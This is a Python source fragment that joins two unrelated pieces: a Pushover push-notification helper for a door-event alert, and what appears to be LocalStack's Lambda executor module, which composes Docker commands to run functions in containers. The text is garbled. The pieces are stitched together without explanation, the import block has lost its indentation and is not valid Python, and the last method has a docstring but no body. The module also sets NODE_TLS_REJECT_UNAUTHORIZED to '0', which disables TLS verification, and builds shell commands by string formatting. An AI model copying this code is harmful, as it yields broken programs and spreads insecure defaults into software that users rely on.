def pushoverPost(msg):
    # Send one notification through the Pushover REST API and log the HTTP
    # response. Python 2 code (httplib/urllib); blocks until the HTTPS
    # round-trip completes, so callers run it on a background thread.
    conn = httplib.HTTPSConnection("api.pushover.net:443")
    conn.request("POST", "/1/messages.json",
        urllib.urlencode({
            "token": m_settings.PUSHOVER_APPTOKEN,
            "user": m_settings.PUSHOVER_USERKEY,
            "message": msg,
        }), { "Content-type": "application/x-www-form-urlencoded" })
    logging.info('HTTP POST Send %s' % msg)
    r = conn.getresponse()
    logging.info("HTTP POST status=%d , reason=%s", r.status, r.reason)
    # Drain the response body (logged for debugging) before closing.
    logging.info(r.read())
    conn.close()
def sendPushover(q):
    # Fire-and-forget notification for a door event; q is interpolated into
    # the message (presumably a sensor reading — confirm with caller).
    # When pushover is disabled in settings, only log a marker line.
    if not m_settings.PUSHOVER_ENABLE :
        logging.info('[TestPrintOnly]Send pushover event')
        return
    m = '我家F門 Event px=%d' % q
    # Post from a daemon-less background thread so the caller never blocks
    # on the HTTPS request.
    t = threading.Thread(target=pushoverPost, args=(m,))
    t.start()
lambda_executors.py | import os
import re
import glob
import json
import time
import logging
import threading
import subprocess
import six
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue, sqs_error_to_dead_letter_queue
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER

# Lambda runtime identifiers, as accepted by the AWS API.
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_PYTHON37 = 'python3.7'
LAMBDA_RUNTIME_PYTHON38 = 'python3.8'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS43 = 'nodejs4.3'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_NODEJS12X = 'nodejs12.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_JAVA11 = 'java11'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_DOTNETCORE31 = 'dotnetcore3.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_PROVIDED = 'provided'

# Name of the file the Java executor reads the event payload from.
LAMBDA_EVENT_FILE = 'event_file.json'

# Port ranges used to hand each invocation a (likely) conflict-free port.
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000

LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000

# logger
LOG = logging.getLogger(__name__)

# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000

# Value of Records[0].eventSource for SQS-originated events.
EVENT_SOURCE_SQS = 'aws:sqs'
def get_from_event(event, key):
    """Return event['Records'][0][key], or None when absent.

    Robustness fix: besides a missing key (KeyError), also tolerate an
    empty 'Records' list (IndexError) and a non-dict/None event
    (TypeError) — all now yield None instead of crashing.
    """
    try:
        return event['Records'][0][key]
    except (KeyError, IndexError, TypeError):
        return None
def is_java_lambda(lambda_details):
    """True when the runtime (given as a string or as a details object
    carrying a `runtime` attribute) is one of the Java runtimes."""
    runtime = getattr(lambda_details, 'runtime', lambda_details)
    return runtime in (LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11)
def is_nodejs_runtime(lambda_details):
    """True when the runtime (string or details object with a `runtime`
    attribute) belongs to the Node.js family."""
    if hasattr(lambda_details, 'runtime'):
        runtime = lambda_details.runtime
    else:
        runtime = lambda_details
    return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
    """Persist one invocation's log output to the function's CloudWatch
    log group, under a date/[LATEST]<container> stream name."""
    when_ms = invocation_time or int(time.time() * 1000)
    stream_suffix = container_id or short_uid()
    day = time.strftime('%Y/%m/%d', time.gmtime(int(when_ms / 1000)))
    group_name = '/aws/lambda/%s' % func_details.name()
    stream_name = '%s/[LATEST]%s' % (day, stream_suffix)
    return store_cloudwatch_logs(group_name, stream_name, log_output, when_ms)
class LambdaExecutor(object):
    """ Base class for Lambda executors. Subclasses must overwrite the _execute method """

    def __init__(self):
        # keeps track of each function arn and the last time it was invoked
        self.function_invoke_times = {}

    def execute(self, func_arn, func_details, event, context=None, version=None,
            asynchronous=False, callback=None):
        """Invoke the Lambda, synchronously or in a background thread.

        On error in asynchronous mode, the event is forwarded to the SQS or
        Lambda dead-letter queue before re-raising.  The callback (if any)
        always runs, receiving the result or the raised error.
        """
        def do_execute(*args):

            @cloudwatched('lambda')
            def _run(func_arn=None):
                # set the invocation time in milliseconds
                invocation_time = int(time.time() * 1000)
                # start the execution
                raised_error = None
                result = None
                dlq_sent = None
                try:
                    result = self._execute(func_arn, func_details, event, context, version)
                except Exception as e:
                    raised_error = e
                    if asynchronous:
                        if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
                            sqs_queue_arn = get_from_event(event, 'eventSourceARN')
                            if sqs_queue_arn:
                                # event source is SQS, send event back to dead letter queue
                                dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
                        else:
                            # event source is not SQS, send back to lambda dead letter queue
                            lambda_error_to_dead_letter_queue(func_details, event, e)
                    raise e
                finally:
                    self.function_invoke_times[func_arn] = invocation_time
                    callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
                # return final result
                return result

            return _run(func_arn=func_arn)

        # Inform users about asynchronous mode of the lambda execution.
        if asynchronous:
            LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
            FuncThread(do_execute).start()
            return None, 'Lambda executed asynchronously.'

        return do_execute()

    def _execute(self, func_arn, func_details, event, context=None, version=None):
        """ This method must be overwritten by subclasses. """
        raise Exception('Not implemented.')

    def startup(self):
        # Hook for subclasses that need to initialize resources.
        pass

    def cleanup(self, arn=None):
        # Hook for subclasses that need to release resources.
        pass

    def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars=None):
        """Run the executor command, feed it the event on stdin, and split
        its output into the Lambda result (last stdout line) and logs.

        Fix: `env_vars` previously defaulted to a shared mutable `{}`
        (mutable-default-argument pitfall); callers are unaffected.
        """
        env_vars = env_vars or {}
        process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE,
            env_vars=env_vars, stdin=True)
        result, log_output = process.communicate(input=event)
        try:
            result = to_str(result).strip()
        except Exception:
            pass
        log_output = to_str(log_output).strip()
        return_code = process.returncode

        # Note: The user's code may have been logging to stderr, in which case the logs
        # will be part of the "result" variable here. Hence, make sure that we extract
        # only the *last* line of "result" and consider anything above that as log output.
        if isinstance(result, six.string_types) and '\n' in result:
            additional_logs, _, result = result.rpartition('\n')
            log_output += '\n%s' % additional_logs

        log_formatted = log_output.strip().replace('\n', '\n> ')
        func_arn = func_details and func_details.arn()
        LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))

        # store log output - TODO get live logs from `process` above?
        _store_logs(func_details, log_output)

        if return_code != 0:
            raise Exception('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
                (return_code, result, log_output))

        return result
class ContainerInfo:
    """
    Basic information about a docker container: its name and the entry
    point used to invoke the Lambda handler inside it.
    """
    def __init__(self, name, entry_point):
        self.name, self.entry_point = name, entry_point
class LambdaExecutorContainers(LambdaExecutor):
    """ Abstract executor class for executing Lambda functions in Docker containers """

    def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
        # Subclasses build and return the concrete docker command line here.
        raise Exception('Not implemented')

    def _docker_cmd(self):
        """ Return the string to be used for running Docker commands. """
        return config.DOCKER_CMD

    def prepare_event(self, environment, event_body):
        """ Return the event as a stdin string. """
        # amend the environment variables for execution
        environment['AWS_LAMBDA_EVENT_BODY'] = event_body
        # Returning None means "no stdin": the event travels via the env var.
        return None

    def _execute(self, func_arn, func_details, event, context=None, version=None):
        """Assemble environment and command for the container, then run the
        Lambda inside it via run_lambda_executor()."""
        lambda_cwd = func_details.cwd
        runtime = func_details.runtime
        handler = func_details.handler
        environment = func_details.envvars.copy()

        # configure USE_SSL in environment
        if config.USE_SSL:
            environment['USE_SSL'] = '1'

        # prepare event body
        if not event:
            LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
            event = {}
        event_body = json.dumps(json_safe(event))
        stdin = self.prepare_event(environment, event_body)

        # Make the LocalStack endpoint reachable from inside the container.
        docker_host = config.DOCKER_HOST_FROM_CONTAINER
        environment['HOSTNAME'] = docker_host
        environment['LOCALSTACK_HOSTNAME'] = docker_host
        environment['_HANDLER'] = handler
        if os.environ.get('HTTP_PROXY'):
            environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
        if func_details.timeout:
            environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
        if context:
            environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
            environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
            environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn

        # custom command to execute in the container
        command = ''

        # if running a Java Lambda, set up classpath arguments
        if is_java_lambda(runtime):
            java_opts = Util.get_java_opts()
            stdin = None
            # copy executor jar into temp directory
            target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
            if not os.path.exists(target_file):
                cp_r(LAMBDA_EXECUTOR_JAR, target_file)
            # TODO cleanup once we have custom Java Docker image
            taskdir = '/var/task'
            # Java reads the event from a file rather than stdin or env.
            save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
            classpath = Util.get_java_classpath(target_file)
            command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
                (taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))

        # accept any self-signed certificates for outgoing calls from the Lambda
        if is_nodejs_runtime(runtime):
            environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'

        # determine the command to be executed (implemented by subclasses)
        cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)

        # lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
        LOG.info('Running lambda cmd: %s' % cmd)
        result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
        return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
    """ Executor class for executing Lambda functions in re-usable Docker containers """

    def __init__(self):
        super(LambdaExecutorReuseContainers, self).__init__()
        # locking thread for creation/destruction of docker containers.
        self.docker_container_lock = threading.RLock()

        # On each invocation we try to construct a port unlikely to conflict
        # with a previously invoked lambda function. This is a problem with at
        # least the lambci/lambda:go1.x container, which execs a go program that
        # attempts to bind to the same default port.
        self.next_port = 0
        self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
        self.port_offset = LAMBDA_SERVER_PORT_OFFSET

    def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
        """Build the shell command that copies code/event into the re-used
        container for this function and execs the handler inside it.

        :param func_arn: ARN of the Lambda function being invoked.
        :param env_vars: dict of environment variables for this invocation (mutated:
            a rotating _LAMBDA_SERVER_PORT entry is added).
        :param runtime: Lambda runtime identifier (e.g. "python3.6").
        :param command: custom command to run in the container, or '' to use
            the image entry point with *handler*.
        :param handler: Lambda handler string.
        :param lambda_cwd: local directory containing the function code.
        :return: composed shell command string (docker cp + docker exec).
        """
        # check whether the Lambda has been invoked before
        has_been_invoked_before = func_arn in self.function_invoke_times

        # Choose a port for this invocation
        with self.docker_container_lock:
            env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
            self.next_port = (self.next_port + 1) % self.max_port

        # create/verify the docker container is running.
        LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
        container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)

        # Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
        # passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
        # available for docker exec, to better support very large Lambda events (very long environment values)
        exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])

        if not command:
            command = '%s %s' % (container_info.entry_point, handler)

        # determine files to be copied into the container
        copy_command = ''
        docker_cmd = self._docker_cmd()
        event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
        if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
            # if this is the first invocation: copy the entire folder into the container
            copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
        elif os.path.exists(event_file):
            # otherwise, copy only the event file if it exists
            copy_command = '%s cp "%s" "%s:/var/task";' % (docker_cmd, event_file, container_info.name)

        cmd = (
            '%s'
            ' %s exec'
            ' %s'  # env variables
            ' %s'  # container name
            ' %s'  # run cmd
        ) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
        LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)

        return cmd

    def startup(self):
        """Reset container state and optionally start the idle-container reaper."""
        self.cleanup()
        # start a process to remove idle containers
        if config.LAMBDA_REMOVE_CONTAINERS:
            self.start_idle_container_destroyer_interval()

    def cleanup(self, arn=None):
        """Destroy the container for *arn*, or every Lambda container when arn is None."""
        if arn:
            self.function_invoke_times.pop(arn, None)
            return self.destroy_docker_container(arn)
        self.function_invoke_times = {}
        return self.destroy_existing_docker_containers()

    def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
        """
        Prepares a persistent docker container for a specific function.
        :param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
        :param func_arn: The ARN of the lambda function.
        :param env_vars: The environment variables for the lambda.
        :param lambda_cwd: The local directory containing the code for the lambda function.
        :return: ContainerInfo class containing the container name and default entry point.
        """
        with self.docker_container_lock:
            # Get the container name and id.
            container_name = self.get_container_name(func_arn)
            docker_cmd = self._docker_cmd()

            status = self.get_docker_container_status(func_arn)
            LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))

            docker_image = Util.docker_image_for_runtime(runtime)
            rm_flag = Util.get_docker_remove_flag()

            # Container is not running or doesn't exist.
            if status < 1:
                # Make sure the container does not exist in any form/state.
                self.destroy_docker_container(func_arn)

                env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])

                network = config.LAMBDA_DOCKER_NETWORK
                network_str = '--network="%s"' % network if network else ''

                # mount the code dir directly unless the Docker daemon is remote
                mount_volume = not config.LAMBDA_REMOTE_DOCKER
                lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
                # presumably a Windows-style path (drive letter + backslashes) -- reformat for Docker
                if (':' in lambda_cwd and '\\' in lambda_cwd):
                    lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
                mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''

                # Create and start the container
                LOG.debug('Creating container: %s' % container_name)
                cmd = (
                    '%s create'
                    ' %s'  # --rm flag
                    ' --name "%s"'
                    ' --entrypoint /bin/bash'  # Load bash when it starts.
                    ' %s'
                    ' --interactive'  # Keeps the container running bash.
                    ' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
                    ' -e HOSTNAME="$HOSTNAME"'
                    ' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
                    ' %s'  # env_vars
                    ' %s'  # network
                    ' %s'
                ) % (docker_cmd, rm_flag, container_name, mount_volume_str, env_vars_str, network_str, docker_image)
                LOG.debug(cmd)
                run(cmd)

                if not mount_volume:
                    LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
                    cmd = (
                        '%s cp'
                        ' "%s/." "%s:/var/task"'
                    ) % (docker_cmd, lambda_cwd, container_name)
                    LOG.debug(cmd)
                    run(cmd)

                LOG.debug('Starting container: %s' % container_name)
                cmd = '%s start %s' % (docker_cmd, container_name)
                LOG.debug(cmd)
                run(cmd)
                # give the container some time to start up
                time.sleep(1)

            # Get the entry point for the image.
            LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
            cmd = (
                '%s image inspect'
                ' --format="{{ .ContainerConfig.Entrypoint }}"'
                ' %s'
            ) % (docker_cmd, docker_image)
            LOG.debug(cmd)
            run_result = run(cmd)

            # inspect prints e.g. "[/entry.sh]\n" -- strip brackets/whitespace
            entry_point = run_result.strip('[]\n\r ')

            container_network = self.get_docker_container_network(func_arn)

            LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
                      % (entry_point, container_name, container_network))

            return ContainerInfo(container_name, entry_point)

    def destroy_docker_container(self, func_arn):
        """
        Stops and/or removes a docker container for a specific lambda function ARN.
        :param func_arn: The ARN of the lambda function.
        :return: None
        """
        with self.docker_container_lock:
            status = self.get_docker_container_status(func_arn)
            docker_cmd = self._docker_cmd()

            # Get the container name and id.
            container_name = self.get_container_name(func_arn)

            if status == 1:
                LOG.debug('Stopping container: %s' % container_name)
                cmd = (
                    '%s stop -t0 %s'
                ) % (docker_cmd, container_name)
                LOG.debug(cmd)
                run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)

                status = self.get_docker_container_status(func_arn)

            if status == -1:
                LOG.debug('Removing container: %s' % container_name)
                cmd = (
                    '%s rm %s'
                ) % (docker_cmd, container_name)
                LOG.debug(cmd)
                run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)

    def get_all_container_names(self):
        """
        Returns a list of container names for lambda containers.
        :return: A String[] localstack docker container names for each function.
        """
        with self.docker_container_lock:
            LOG.debug('Getting all lambda containers names.')
            cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
            LOG.debug(cmd)
            cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()

            if len(cmd_result) > 0:
                container_names = cmd_result.split('\n')
            else:
                container_names = []

            return container_names

    def destroy_existing_docker_containers(self):
        """
        Stops and/or removes all lambda docker containers for localstack.
        :return: None
        """
        with self.docker_container_lock:
            container_names = self.get_all_container_names()

            LOG.debug('Removing %d containers.' % len(container_names))
            for container_name in container_names:
                cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
                LOG.debug(cmd)
                run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)

    def get_docker_container_status(self, func_arn):
        """
        Determine the status of a docker container.
        :param func_arn: The ARN of the lambda function.
        :return: 1 If the container is running,
        -1 if the container exists but is not running
        0 if the container does not exist.
        """
        with self.docker_container_lock:
            # Get the container name and id.
            container_name = self.get_container_name(func_arn)

            # Check if the container is already running
            # Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
            # systems. Therefore, we use a combination of filter and grep to get the results.
            # NOTE(review): uses a hard-coded 'docker' binary rather than self._docker_cmd()
            # like the other methods -- confirm whether this is intentional.
            cmd = ("docker ps -a --filter name='%s' "
                   '--format "{{ .Status }} - {{ .Names }}" '
                   '| grep -w "%s" | cat') % (container_name, container_name)
            LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
            cmd_result = run(cmd)

            # If the container doesn't exist. Create and start it.
            container_status = cmd_result.strip()

            if len(container_status) == 0:
                return 0

            if container_status.lower().startswith('up '):
                return 1

            return -1

    def get_docker_container_network(self, func_arn):
        """
        Determine the network of a docker container.
        :param func_arn: The ARN of the lambda function.
        :return: name of the container network
        """
        with self.docker_container_lock:
            status = self.get_docker_container_status(func_arn)
            # container does not exist
            if status == 0:
                return ''

            # Get the container name.
            container_name = self.get_container_name(func_arn)
            docker_cmd = self._docker_cmd()

            # Get the container network
            LOG.debug('Getting container network: %s' % container_name)
            cmd = (
                '%s inspect %s'
                ' --format "{{ .HostConfig.NetworkMode }}"'
            ) % (docker_cmd, container_name)
            LOG.debug(cmd)
            cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)

            container_network = cmd_result.strip()

            return container_network

    def idle_container_destroyer(self):
        """
        Iterates though all the lambda containers and destroys any container that has
        been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
        :return: None
        """
        LOG.info('Checking if there are idle containers.')
        current_time = int(time.time() * 1000)
        # iterate over a copy, since destroy_docker_container may mutate the dict
        for func_arn, last_run_time in dict(self.function_invoke_times).items():
            duration = current_time - last_run_time

            # not enough idle time has passed
            if duration < MAX_CONTAINER_IDLE_TIME_MS:
                continue

            # container has been idle, destroy it.
            self.destroy_docker_container(func_arn)

    def start_idle_container_destroyer_interval(self):
        """
        Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
        Thus checking for idle containers and destroying them.
        :return: None
        """
        self.idle_container_destroyer()
        threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()

    def get_container_name(self, func_arn):
        """
        Given a function ARN, returns a valid docker container name.
        :param func_arn: The ARN of the lambda function.
        :return: A docker compatible name for the arn.
        """
        return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
    """Executor that launches a fresh, one-shot Docker container per invocation."""

    def __init__(self):
        super(LambdaExecutorSeparateContainers, self).__init__()
        # Rotating counter used to choose a distinct host port per invocation
        # when running on the "host" Docker network (see prepare_execution).
        self.next_port = 1
        self.max_port = LAMBDA_API_UNIQUE_PORTS
        self.port_offset = LAMBDA_API_PORT_OFFSET

    def prepare_event(self, environment, event_body):
        """Arrange for the event payload to be delivered via the container's STDIN.

        :param environment: env var dict for the container (mutated in place).
        :param event_body: JSON string of the Lambda event.
        :return: the event encoded as bytes, to be piped to the process stdin.
        """
        # Tell Lambci to use STDIN for the event
        environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
        return event_body.encode()

    def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
        """Compose the 'docker run' (or create/cp/start) command for one invocation.

        :param func_arn: ARN of the Lambda function (unused here, part of the interface).
        :param env_vars: dict of environment variables for the container (mutated
            when running on the "host" network: API/runtime ports are added).
        :param runtime: Lambda runtime identifier, used to select the image.
        :param command: custom command to run, or '' to run the image entry point
            with *handler* as argument.
        :param handler: Lambda handler string.
        :param lambda_cwd: local directory containing the function code.
        :return: the composed shell command string.
        """
        entrypoint = ''
        if command:
            # a custom command overrides the image entry point
            entrypoint = ' --entrypoint ""'
        else:
            command = '"%s"' % handler

        # add Docker Lambda env vars
        network = config.LAMBDA_DOCKER_NETWORK
        network_str = '--network="%s"' % network if network else ''
        if network == 'host':
            # on the host network, pick rotating ports to avoid collisions
            # between concurrent invocations
            port = str(self.next_port + self.port_offset)
            env_vars['DOCKER_LAMBDA_API_PORT'] = port
            env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
            self.next_port = (self.next_port + 1) % self.max_port

        env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
        debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
        docker_cmd = self._docker_cmd()
        docker_image = Util.docker_image_for_runtime(runtime)
        rm_flag = Util.get_docker_remove_flag()

        if config.LAMBDA_REMOTE_DOCKER:
            # remote daemon: cannot bind-mount, so create + docker cp + start
            cmd = (
                'CONTAINER_ID="$(%s create -i'
                ' %s'  # entrypoint
                ' %s'  # debug_docker_java_port
                ' %s'  # env
                ' %s'  # network
                ' %s'  # --rm flag
                ' %s %s'  # image and command
                ')";'
                '%s cp "%s/." "$CONTAINER_ID:/var/task"; '
                '%s start -ai "$CONTAINER_ID";'
            ) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, rm_flag,
                 docker_image, command,
                 docker_cmd, lambda_cwd,
                 docker_cmd)
        else:
            # local daemon: bind-mount the code directory directly
            lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
            cmd = (
                '%s run -i'
                ' %s -v "%s":/var/task'
                ' %s'
                ' %s'  # network
                ' %s'  # --rm flag
                ' %s %s'
            ) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
                 network_str, rm_flag, docker_image, command)
        return cmd
class LambdaExecutorLocal(LambdaExecutor):
    """Executor that runs the Lambda handler inside the LocalStack process itself."""

    def _execute(self, func_arn, func_details, event, context=None, version=None):
        """Invoke the function handler in-process, capturing stdout/stderr as logs.

        :param func_arn: ARN of the Lambda function.
        :param func_details: function metadata (cwd, envvars, handler factory).
        :param event: the Lambda event object.
        :param context: optional Lambda context object.
        :param version: optional function version to invoke.
        :return: the handler's return value.
        """
        lambda_cwd = func_details.cwd
        environment = func_details.envvars.copy()

        # execute the Lambda function in a forked sub-process, sync result via queue
        queue = Queue()

        lambda_function = func_details.function(version)

        def do_execute():
            # now we're executing in the child process, safe to change CWD and ENV
            if lambda_cwd:
                os.chdir(lambda_cwd)
            if environment:
                os.environ.update(environment)
            result = lambda_function(event, context)
            queue.put(result)

        process = Process(target=do_execute)
        with CaptureOutput() as c:
            # NOTE(review): Process.run() executes do_execute() in the *current*
            # process (no fork actually happens, despite the comments above);
            # presumably deliberate so CaptureOutput and the Queue work -- confirm.
            process.run()
        result = queue.get()

        # Make sure to keep the log line below, to ensure the log stream gets created
        log_output = 'START: Lambda %s started via "local" executor ...' % func_arn
        # TODO: Interweaving stdout/stderr currently not supported
        for stream in (c.stdout(), c.stderr()):
            if stream:
                log_output += ('\n' if log_output else '') + stream

        # store logs to CloudWatch
        _store_logs(func_details, log_output)

        return result

    def execute_java_lambda(self, event, context, main_file, func_details=None):
        """Run a Java Lambda locally by shelling out to the bundled executor JAR.

        :param event: the Lambda event, serialized to a temp file for the JVM.
        :param context: Lambda context (unused by the java command line here).
        :param main_file: path to the function's main JAR/ZIP archive.
        :param func_details: function metadata (provides the handler string).
        :return: result of run_lambda_executor for the composed java command.
        """
        handler = func_details.handler
        opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
        event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
        save_file(event_file, json.dumps(event))
        # register for cleanup of the temp event file
        TMP_FILES.append(event_file)
        # handler is "com.example.Cls::method"; only the class name is passed on
        class_name = handler.split('::')[0]
        classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
        cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
        LOG.warning(cmd)
        result = self.run_lambda_executor(cmd, func_details=func_details)
        return result
class Util:
    """Static helpers for building docker/java command lines."""

    # Falsy sentinel until a debug port is allocated or parsed; afterwards holds
    # the port (an int from get_free_tcp_port(), or a str captured by the regex
    # in get_java_opts).
    debug_java_port = False

    @classmethod
    def get_java_opts(cls):
        """Return LAMBDA_JAVA_OPTS with the '_debug_port_' placeholder resolved."""
        opts = config.LAMBDA_JAVA_OPTS or ''
        # Replace _debug_port_ with a random free port
        if '_debug_port_' in opts:
            if not cls.debug_java_port:
                cls.debug_java_port = get_free_tcp_port()
            opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
        else:
            # Parse the debug port from opts
            m = re.match('.*address=(\\d+).*', opts)
            if m is not None:
                cls.debug_java_port = m.groups()[0]

        return opts

    @classmethod
    def get_host_path_for_path_in_docker(cls, path):
        """Map a path under TMP_FOLDER (inside this container) to the equivalent
        path on the Docker host (HOST_TMP_FOLDER); other paths pass through."""
        return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
                      r'%s/\1' % config.HOST_TMP_FOLDER, path)

    @classmethod
    def format_windows_path(cls, path):
        """Convert a Windows path (e.g. C:\\x\\y) to the slash form Docker
        volume mounts expect, prefixed with WINDOWS_DOCKER_MOUNT_PREFIX."""
        temp = path.replace(':', '').replace('\\', '/')
        if len(temp) >= 1 and temp[:1] != '/':
            temp = '/' + temp
        temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
        return temp

    @classmethod
    def docker_image_for_runtime(cls, runtime):
        """Return the (double-quoted) docker image ref for a Lambda runtime."""
        docker_tag = runtime
        docker_image = config.LAMBDA_CONTAINER_REGISTRY
        # TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
        # See https://github.com/lambci/docker-lambda/pull/218
        lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
        if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
            docker_tag = '20191117-%s' % docker_tag
        return '"%s:%s"' % (docker_image, docker_tag)

    @classmethod
    def get_docker_remove_flag(cls):
        """Return '--rm' when containers should be auto-removed, else ''."""
